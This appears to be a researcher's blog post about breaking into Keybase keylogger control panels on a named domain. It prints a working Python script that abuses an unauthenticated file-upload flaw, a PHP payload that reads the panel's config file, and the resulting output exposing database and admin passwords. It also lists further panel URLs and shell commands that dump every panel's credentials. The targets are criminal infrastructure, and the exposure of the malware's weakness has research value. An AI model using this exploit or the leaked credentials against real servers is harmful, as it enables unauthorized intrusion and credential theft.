1 panel, 2 panels, 3 panels...
1 panel, 2 panels, 3 panels...
I was hanging out on Cybercrime-Tracker and noticed some Keybase panels. I never heard of that one before so I decided to take a look. Turns out Keybase is not a botner but rather a keylogger, it can also take screenshot of the victim's desktop.
One of the domain was still up and there was 3 Keybase panels listed on Cybercrime Tracker:
- www.omarabdulaziz.com/golden/login.php
- www.omarabdulaziz.com/daniel/login.php
- www.omarabdulaziz.com/ugo/login.php
The first fail is that permission are not checked on the /image/Imaged
directory, therefore anyone aware of this can access the screenshots:
The first two panels didn't have the /images/upload.php
file but luckily for me the ugo
did.
Unit 32 already found some nice vulnerabilities in the Keybase source code so I tried it.
I ran this python script with the next file as argument.
import requests
import sys
if len(sys.argv) != 2:
print "Usage: %s [php_file]" % __file__
sys.exit(1)
URL = "http://www.omarabdulaziz.com/ugo/"
print "Sending request..."
multiple_files = [('file', ('owned.php', open(sys.argv[1], 'rb')))]
r = requests.post(URL + "image/upload.php", files=multiple_files)
print r
print "Results:"
print
r = requests.get(URL + "image/Images/owned.php")
print r.text
<?php
$file = '../../config.php';
echo "It works!"."</br>";
if (file_exists($file)) {
echo "Reading file"."</br>";
echo file_get_contents($file);
}
?>
Here's the result:
Sending request...
<Response [200]>
Results:
It works!</br>Reading file</br><?php
ob_start();
//Edit your database details
$mysql_host = "localhost";
$mysql_database = "omarabdu_ugo";
$mysql_user = "omarabdu_ugo";
$mysql_password = "joinkrama2";
//These are for accessing your web-panel. You can change these any time.
$panelusername = "admin";
$panelpassword = "ugo12345";
?>
So of course... I got in
That's pretty cool, but are all the panels of this domain actually listed on cybercrime-tracker? I took a look at the public_html folder and found additional panels:
- http://www.omarabdulaziz.com/chuks/login.php
- http://www.omarabdulaziz.com/panel2/login.php
- http://www.omarabdulaziz.com/nonso/login.php
- http://www.omarabdulaziz.com/owerri/login.php
So you got it... Since we got cmd exec we can get the passwords for all the panels at once:
cat /home/omarabdu/public_html/ugo/config.php &
cat /home/omarabdu/public_html/daniel/config.php &
cat /home/omarabdu/public_html/golden/config.php &
cat /home/omarabdu/public_html/chuks/config.php &
cat /home/omarabdu/public_html/panel2/config.php &
cat /home/omarabdu/public_html/owerri/config.php
cat /home/omarabdu/public_html/nonso/config.php
Let me know what you think of this article on twitter @misterch0c or leave a comment below!